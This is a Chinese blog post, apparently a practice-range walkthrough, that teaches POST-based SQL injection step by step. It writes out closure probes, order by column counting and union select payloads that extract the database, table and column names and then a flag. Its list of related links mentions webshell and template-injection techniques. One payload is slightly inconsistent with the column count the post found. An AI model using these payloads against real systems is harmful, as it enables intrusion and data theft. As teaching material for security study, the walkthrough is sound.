post注入是通过对输入框进行传参，可以被带入数据库进行的查询

# 注入的两个条件：1.用户可以控制传参，2.用户输入的语句被带入数据库进行查询

1.查询是否有注入点
对输入框填入一些闭合的符号，看页面是否异常
例如： ’        "          ')          ")
填入 ’

页面正常，
在填入 "

页面发生错误，证明 " 闭合有效
输入：“and1=1#

竟然也显示报错，因为填入and 1=1 是肯定成立不会报错的，这里显示异常，所以证明不单单是"闭合，可能还有个括号没闭合
输入 “)and 1=1#

页面显示正常，证明有注入点，并要用”)进行闭合，方可进行查询
2。order by 语句查询有几个字段
例：”)order by 3# 出错，
")order by 2# 显示正确，判断为2个字段

3.使用union 联合查询 显错点，输出点
语句：
") union select 1,2#

4.查询当前库名
语句：
") union select 1,database()#

当前库名为security
5。查表名，利用当前库名查系统表
语句：
") union select 1,group_concat(table_name) from information_schema.tables where table_schema=“security” #

6。查字段名
语句：
") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“zkaq” #

7.查表内的信息
语句：
")union select group_concat(flag),group_concat(zKaQ) from zkaq #

我们想要的表内的所有信息如图展示

我们也得到了我们需要的信息：flag为：zKaQ-P0stD0ubl4

特别详细的POST 注入 思路相关推荐

1. 最详细的SQL注入相关的命令整理

   最详细的SQL注入相关的命令整理   QUOTE: 1.   用^转义字符来写ASP(一句话***)文件的方法: ?   http://192.168.1.5/display.asp?keyno=18 ...

2. jinja2模板注入_Flask jinja2 模板注入思路总结

   Flask jinja2 模板注入思路总结 前言 虽然这个漏洞已经出现很久了, 不过偶尔还是能够看到翻了翻 freebuf 上好像只有 python2 的一些 payload, 方法也不是很全我找来找 ...

3. 最详细的SQL注入语句

   最详细的SQL注入语句相关的命令整理 1.    用^转义字符来写ASP(一句话木马)文件的方法:    http://192.168.1.5/display.asp?keyno=1881;exec ...

4. 常见操作系统命令注入思路

   常见操作系统命令注入思路 一.什么是命令注入: 命令注入: OS command injection翻译过来是操作系统命令注入,它可以让攻击者可以在运行应用程序的服务器上执行任意的操作系统(Opera ...

5. bWAPP中SQL注入思路

   bWAPP中SQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里 ...

6. python入门教程收藏_特别详细的Python入门教程，建议收藏

   Python是一种简单易学,功能强大的编程语言,它有高效率的高层数据结构,简单而有效地实现面向对象编程.Python简洁的语法和对动态输入的支持,再加上解释性语言的本质,使得它在大多数编程语言的使用场 ...

7. 阿里P8架构师谈：Dubbo的详细介绍、设计思路、以及4大适用场景

   Dubbo是什么? Dubbo是一个分布式服务框架,致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案. 简单的说,dubbo就是个服务框架,如果没有分布式的需求,其实是不需要用 ...

8. 最详细的整套模具设计思路与流程 ！

   一套可靠的塑料模具设计,主要体现在所成型的塑料制品的质量(外观质量和尺寸稳定性),加工制造时方便.迅速.简练,既又省资金.人力,留有更正.改良余地.使用时安全.稳定.便于维修.在注射成型时有较短的成型 ...

9. 从PDO下的SQL注入思路到获得GIT 3000star项目0day

   0x01 PDO简介 PDO全名PHP Data Object PDO扩展为PHP访问数据库定义了一个轻量级的一致接口.PDO提供了一个数据访问抽象层,这意味着,不管使用哪种数据库,都可以使用相同的函 ...

最新文章

1. 复旦大学邱锡鹏教授：一张图带你梳理深度学习知识脉络
2. 三分钟学会用SpringMVC搭建最小系统（超详细)_转载
3. [PHP]php发布和调用Webservice接口的案例
4. 黑莓blackberry手机刷ROM 的详细教程
5. php ajax工作原理,AJAX实现页面无刷新操作原理解析
6. setdefaultencoding函数使用详解
7. e3是合法浮点数吗_下面4个选项中，均是合法浮点数的选项是？
8. sql建立到mysql的会话_SQLalchemy会话和多个数据库尝试创建twi索引
9. HTML5应用程序缓存实现离线Web网页或应用
10. json_encode
11. 计算机应用基础word的课件,计算机应用基础之word2010课件
12. 看到Apache协议 BSD协议，你知道啥意思吗
13. 微信小程序开发实战1 微信小程序开发概述
14. 电厂GPS北斗时钟同步（卫星时间同步系统）组成及配置
15. App（iOS Android）开发时简单的用户反馈实现
16. 【算法】深度搜索(DFS) 和 广度搜索(BFS)
17. 科普文章-另一个视角解读计算机编码 修订版
18. android ViewPager轮播制作成品——轮播制作（六）
19. 毕业设计-基于机器学习的动态 CAPM 模型
20. 杭电复试 —— 2015年

热门文章

1. 关联分析算法Apriori和FP-Growth
2. 平台为王的物联网时代，IBM 的Waston凭何杀出重围？
3. Jetty和和Tomcat比较
4. 90后程序员的5年创业总结：什么样的程序员适合创业
5. Windows Server 2008 R2 遗忘管理员密码后的解决方法
6. 去哪里找你的天使投资人？
7. 使用ContactsContract APIhttp://www.cnblogs.com/carbs/archive/2012/07/16/2593295.html
8. CAT5E、CAT6和CAT6A在系统性能及网络应用上有什么区别
9. vue项目使用bootstrap模态框叠加滚动条及蒙层解决方案
10. 实施工程师的发展前景_湿式电除尘设备的发展前景